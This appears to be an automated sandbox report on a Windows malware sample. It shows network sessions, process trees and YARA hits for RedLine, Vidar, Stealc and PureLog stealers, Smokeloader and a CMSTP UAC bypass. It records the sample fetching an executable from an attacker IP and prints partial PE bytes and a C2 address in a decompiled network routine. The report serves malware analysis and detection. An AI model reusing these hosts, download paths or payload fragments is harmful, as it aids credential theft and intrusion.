Apr 26, 2024 23:09:14.354841948 CEST	469	IN	HTTP/1.1 200 OK cache-control: private content-length: 256 content-type: text/html; charset=utf-8 x-whom: Ioloweb5 date: Fri, 26 Apr 2024 21:09:13 GMT set-cookie: SERVERID=svc5; path=/ connection: close Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32 Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49755	20.157.87.45	80	3428	C:\Users\user\AppData\Local\Temp\u5ek.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 23:09:40.608616114 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 26, 2024 23:09:40.848504066 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 26, 2024 23:09:41.081576109 CEST	405	IN	HTTP/1.1 200 OK cache-control: private content-length: 192 content-type: text/html; charset=utf-8 x-whom: Ioloweb9 date: Fri, 26 Apr 2024 21:09:39 GMT set-cookie: SERVERID=svc9; path=/ connection: close Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53 Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	185.172.128.203	80	3484	C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 23:09:41.069597006 CEST	76	OUT	GET /tiktok.exe HTTP/1.1 Host: 185.172.128.203 Cache-Control: no-cache
Apr 26, 2024 23:09:41.309035063 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:09:41 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT ETag: "85400-616de2c892480" Accept-Ranges: bytes Content-Length: 545792 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$c'i'i'i[7iYiX8i73i7i7i.9"i'i}i7%i7U&i'i=&i7&iRich'iPELv)f@@P(@( lp @.text1 `.rdata@@.data@ @.gfids@@.rsrc@(*@@.relocl @B [TRUNCATED]
Apr 26, 2024 23:09:41.309047937 CEST	1289	IN	Data Raw: 46 00 e8 1c 73 05 00 59 c3 68 09 bf 46 00 e8 10 73 05 00 59 c3 68 13 bf 46 00 e8 04 73 05 00 59 c3 68 1d bf 46 00 e8 f8 72 05 00 59 c3 b9 a0 bd 47 00 e8 71 56 05 00 68 27 bf 46 00 e8 e2 72 05 00 59 c3 55 8b ec 83 ec 0c a1 6c b0 47 00 33 c5 89 45 Data Ascii: FsYhFsYhFsYhFrYGqVh'FrYUlG3EUEVUNEQWFPfyM3^{k]UVWFPFfEPy^]IpvGEUVFFPyEtj
Apr 26, 2024 23:09:41.309113979 CEST	1289	IN	Data Raw: 3e 00 75 64 6a 18 e8 06 69 05 00 8b f8 83 c4 04 89 7d 08 8b 4d 0c c7 45 fc 00 00 00 00 8b 51 04 85 d2 75 07 b9 a0 76 47 00 eb 0a 8b 4a 18 85 c9 75 03 8d 4a 1c 51 8d 4d ac e8 dc fb ff ff 8d 45 e0 c7 47 04 00 00 00 00 50 c7 07 58 c7 46 00 e8 90 58 Data Ascii: >udji}MEQuvGJuJQMEGPXFXMG>MdY_^]UAPEPX]US]3Vu+W3;uGtAEPPyXGEF;u_^[]
Apr 26, 2024 23:09:41.309127092 CEST	1289	IN	Data Raw: 01 8a 08 40 84 c9 75 f9 2b c2 3b f0 72 e3 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 55 ba 46 00 64 a1 00 00 00 00 50 53 81 ec 80 00 00 00 a1 6c b0 47 00 33 Data Ascii: @u+;r_^]SUkl$jhUFdPSlG3EVWPEd(~GGG0G)88z(\|G G4G`%Z/8G,QWEhGMEE~r>?u3QAu+QjEP
Apr 26, 2024 23:09:41.309150934 CEST	1289	IN	Data Raw: 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d c4 33 d2 e8 33 f8 ff ff c7 45 c4 00 00 00 00 c6 45 fc 0c 8b 4d d4 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 45 d8 85 c0 74 12 f0 0f c1 70 20 4e 75 0a 8b 4d d8 33 d2 e8 f3 Data Ascii: tA uM33EEMt@tjEtp NuM3EEMt@tj(p}GGGG31zG`%Z/GQWEhGMEE~r>?u3
Apr 26, 2024 23:09:41.309170961 CEST	1289	IN	Data Raw: 3b f3 ff ff c7 45 88 00 00 00 00 c6 45 fc 1c 8b 4d 98 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 4d 9c 85 c9 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d 9c 33 d2 e8 fa f2 ff ff c7 45 9c 00 00 00 00 c6 45 fc 1d 8b 4d Data Ascii: ;EEMt@tjMtA uM3EEMt@tjMtA uM3EEMt@tjMtA uM3xEEMt@tjE
Apr 26, 2024 23:09:41.309185028 CEST	1289	IN	Data Raw: 0f 00 00 00 c7 41 10 00 00 00 00 50 c6 01 00 e8 62 05 00 00 e8 cd 32 05 00 83 c4 18 83 7c 24 1c 00 76 57 ff 15 cc c9 47 00 8b 44 24 1c 40 50 6a 02 ff 15 c0 c9 47 00 8b f0 85 f6 74 3d 83 7c 24 20 10 8d 54 24 0c 8b 4c 24 1c 0f 43 54 24 0c 41 51 52 Data Ascii: APb2\|$vWGD$@PjGt=\|$ T$L$CT$AQRVGPGVGVjGVGD$ r@L$Pt$D$ D$D$\|$8D$$D$4CD$$GhG6'@'@#(@(@)@)@
Apr 26, 2024 23:09:41.309225082 CEST	1289	IN	Data Raw: 10 89 7e 10 72 0e 8b 06 5f c6 00 00 8b c6 5e 5b 5d c2 08 00 8b c6 5f 5e 5b c6 00 00 5d c2 08 00 8b c6 85 ff 74 0b 57 53 50 e8 5f 71 05 00 83 c4 0c 83 7e 14 10 89 7e 10 72 0f 8b 06 c6 04 38 00 8b c6 5f 5e 5b 5d c2 08 00 8b c6 c6 04 38 00 5f 8b c6 Data Ascii: ~r_^[]_^[]tWSP_q~~r8_^[]8_^[]hvG>US]VMWC;}+;G;uG99FF~rQj_^[]Qj_^[]9~s$vW
Apr 26, 2024 23:09:41.309242964 CEST	1289	IN	Data Raw: 3b 46 10 76 04 85 c0 75 9b 8b 4e 10 3b c1 77 19 89 46 10 83 7e 14 10 72 08 8b 0e c6 04 01 00 eb 14 8b ce c6 04 01 00 eb 0c 2b c1 8b ce 6a 00 50 e8 ff fd ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc Data Ascii: ;FvuN;wF~r+jPMdY_^[]UAPuuuu;y]3]UjhpFdPSVWlG3PEdeuEv'^;v<+
Apr 26, 2024 23:09:41.309276104 CEST	1289	IN	Data Raw: e8 99 30 05 00 83 c4 04 8d 4d e4 e8 d5 2e 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d ec 33 cd e8 93 43 05 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 ac c1 46 00 66 0f d6 00 Data Ascii: 0M.MdY_^[M3C]UVWFPFfEPQLF^]VNt$F+PQFFF^Vt#F+PQFF^UjhFdPPVWl
Apr 26, 2024 23:09:41.548446894 CEST	1289	IN	Data Raw: c7 00 00 00 00 00 6a 01 8b 01 ff 10 85 f6 75 e9 6a 00 6a 00 c7 47 24 00 00 00 00 e8 9c 6b 05 00 cc cc 56 8b f1 8b 4e 40 85 c9 74 24 8b 46 48 2b c1 c1 f8 03 50 51 e8 b7 03 00 00 c7 46 40 00 00 00 00 c7 46 44 00 00 00 00 c7 46 48 00 00 00 00 8b 4e Data Ascii: jujjG$kVN@t$FH+PQF@FDFHN4t$F<+PQF4F8F<N$t$F,+PQF$F(F,Nt$F+PQ6FFFNt$F+PQFF

Target ID:	0
Start time:	23:08:51
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\wxfSIz4PAi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\wxfSIz4PAi.exe"
Imagebase:	0x400000
File size:	460'289 bytes
MD5 hash:	0A7871874DC7111B978E798F616211F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1819490382.00000000071F2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:08:56
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5ek.0.exe"
Imagebase:	0x400000
File size:	312'320 bytes
MD5 hash:	ACAAA65D3F174EBF3595E23522837B43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2160863373.00000000042D4000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:09:08
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe"
Imagebase:	0x170000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:09:09
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2166598623.0000000006250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2166598623.0000000006250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:09:09
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	23:09:12
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5ek.3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5ek.3.exe"
Imagebase:	0x400000
File size:	4'866'096 bytes
MD5 hash:	397926927BCA55BE4A77839B1C44DE6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000000.1817573323.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	23:09:12
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 1564
Imagebase:	0xe10000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	23:09:38
Start date:	26/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xf10000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	23:09:41
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Imagebase:	0x27276ab0000
File size:	59'721'128 bytes
MD5 hash:	8E9C467EAC35B35DA1F586014F29C330
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000000.2111483520.0000027276AEB000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	23:09:42
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	23:09:42
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	23:09:42
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 2220
Imagebase:	0xe10000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	23:09:42
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"
Imagebase:	0x6b0000
File size:	545'792 bytes
MD5 hash:	6C93FC68E2F01C20FB81AF24470B790C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	23:09:49
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe"
Imagebase:	0x170000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	23:09:50
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2506109737.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2506629951.0000000005140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2506629951.0000000005140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	23:09:50
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	23:10:14
Start date:	26/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xfe0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.2505942947.0000000001402000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.2505942947.0000000001402000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	2.5%
Signature Coverage:	13.1%
Total number of Nodes:	1111
Total number of Limit Nodes:	17

Executed Functions

Function 0042676C Relevance: 51.9, APIs: 16, Strings: 13, Instructions: 1148
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00426771
WSAStartup.WS2_32(00000202,?), ref: 004273FD
socket.WS2_32(00000002,00000001,00000006), ref: 00427413
WSACleanup.WS2_32 ref: 0042742D
gethostbyname.WS2_32(00000000), ref: 00427441
htons.WS2_32(?), ref: 00427473
connect.WS2_32(00000000,?,00000010), ref: 00427484
send.WS2_32(00000000,00000000,00000000,00000000), ref: 004274A7
send.WS2_32(00000000,00000000,?,00000000), ref: 004274C3
recv.WS2_32(00000000,00000000,00000001,00000000), ref: 00427503
recv.WS2_32(?,00000000,00000001,00000000), ref: 00427681
recv.WS2_32(?,?,00000000,00000000), ref: 00427720
recv.WS2_32(?,0000000A,00000002,00000000), ref: 00427747
recv.WS2_32(00000000,?,?,00000000), ref: 004277A8
WSACleanup.WS2_32 ref: 004277E6
closesocket.WS2_32(?), ref: 004277ED

Strings

Host: , xrefs: 00426BF2, 00426C2C, 00426C43
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 , xrefs: 00426D1E, 00426FEC, 00427003
/ping.php?substr=%s, xrefs: 0042677D
HTTP/1.1 200 OK, xrefs: 0042678D, 0042683A, 0042754B
POST , xrefs: 00426AA7, 00426AD5, 00426B39
HTTP/1.1, xrefs: 00426B5E, 00426BBC, 00426BD3
Content-Length, xrefs: 00426853, 004268ED, 004275AB
User-Agent: , xrefs: 00426C73, 00426CF5, 00426D0C
(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36, xrefs: 00427015, 0042729B, 004272B2
chunked, xrefs: 004269E7, 00426A2D, 004275F8
GET , xrefs: 00426AF5, 00426B17, 00426B31
Transfer-Encoding, xrefs: 0042690B, 004269C9, 004275E7
185.172.128.228, xrefs: 0042677C

Memory Dump Source

